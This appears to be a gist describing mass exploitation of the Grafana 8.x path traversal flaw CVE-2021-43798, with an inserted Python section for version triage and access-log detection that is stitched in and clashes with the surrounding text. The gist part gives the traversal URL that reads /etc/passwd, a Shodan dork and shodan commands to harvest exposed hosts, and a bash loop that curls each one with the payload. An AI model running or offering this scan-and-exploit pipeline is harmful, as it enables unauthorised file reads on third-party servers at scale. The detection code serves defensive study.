Created
January 6, 2022 14:33
Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798).
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files.
Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
Vulnerable URL:
http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
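The two defensive checks a practitioner wants from the description above are (1) a version triage against the affected range and patched releases the gist lists, and (2) detection of traversal requests against the /public/plugins/ path in web-server or reverse-proxy access logs. The following is an added Python example, not code from the gist or from Grafana; the access-log lines are constructed samples in combined-log format, the plugin ids and client addresses are made up, and the repeated percent-decoding is a detection choice (to catch encoding variants of the same request) rather than a statement about how Grafana itself decodes paths. It generalises beyond the single alertlist URL on the page to any plugin id and any number of `..` segments.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jan/2022:14:33:01 +0000] "GET /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1523
203.0.113.5 - - [06/Jan/2022:14:33:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 8812
198.51.100.9 - - [06/Jan/2022:14:34:10 +0000] "GET /public/plugins/welcome/%252e%252e/%252e%252e/conf/defaults.ini HTTP/1.1" 200 991
198.51.100.9 - - [06/Jan/2022:14:34:11 +0000] "GET /api/health HTTP/1.1" 200 55
"""

# Patched releases per minor line, as stated in the advisory text: 8.0.7, 8.1.8, 8.2.7, 8.3.1.
PATCHED = {(8, 0): (8, 0, 7), (8, 1): (8, 1, 8), (8, 2): (8, 2, 7), (8, 3): (8, 3, 1)}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-(.+))?")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[0-9.]+"')
PLUGIN_PREFIX = "/public/plugins/"


def is_affected_version(version):
    """Affected range from the description: 8.0.0-beta1 through 8.3.0, minus the
    patched releases. A pre-release suffix (e.g. '-beta1') sorts below the bare
    release with the same numbers, so 8.0.7-beta1 is treated as before 8.0.7."""
    m = VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    major, minor, patch = (int(x) for x in m.groups()[:3])
    is_release = 0 if m.group(4) else 1
    if major != 8 or (major, minor) not in PATCHED:
        return False  # 7.x, 8.4+ and later majors are outside the stated range
    return (major, minor, patch, is_release) < PATCHED[(major, minor)] + (1,)


def normalize_path(path, max_rounds=3):
    """Percent-decode until stable so %2f, %2e and double-encoded %252e variants
    all collapse to literal '/' and '.' before the segment walk."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_plugin_dir(path):
    """True if a /public/plugins/<plugin>/... request walks above the plugin's own
    directory, which is the shape of the CVE-2021-43798 request shown on the page."""
    decoded = normalize_path(path.split("?", 1)[0])
    if not decoded.startswith(PLUGIN_PREFIX):
        return False
    segments = [s for s in decoded[len(PLUGIN_PREFIX):].split("/") if s]
    depth = 0  # how many directory levels below <plugin>/ we currently are
    for seg in segments[1:]:  # segments[0] is the plugin id itself
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg != ".":
            depth += 1
    return False


def find_traversal_attempts(log_text):
    """Return (client_ip, raw_request_path) for every log line whose request
    escapes the plugin directory. Only GET-style request lines are parsed."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and escapes_plugin_dir(m.group("path")):
            hits.append((line.split(" ", 1)[0], m.group("path")))
    return hits


if __name__ == "__main__":
    for ip, path in find_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt from", ip, "->", path)
    for v in ("8.0.0-beta1", "8.3.0", "8.3.1", "7.5.11"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

Run against a real access log, the function returns the client and raw path for each matching request; a 200 response on such a line is the signal to escalate, since a patched instance should not serve a file above the plugin directory. The version check treats `8.0.7-beta1` as affected and `8.0.7` as fixed, matching the way the description frames the patched releases as the first safe build on each minor line.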
Shodan Dork: http.title:"grafana"
To download the results we will use the command below (Note: a Shodan Premium API key is needed to download the results)
#shodan download grafana 'http.title:"grafana"'
We will separate the IP:PORT from the Shodan results using the shodan parse command along with awk
#shodan parse grafana.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a grafana-ip.txt
I already downloaded the results using the shodan cli command
#cat grafana-ip.txt | httpx | tee -a urls.txt
We will use the process below to automate the findings
#cat urls.txt | while read host; do curl -sk --insecure "$host/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" | grep "root:x" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done
This way we can check each vulnerable URL and report it to the respective organization.
Check the Vulnerable URL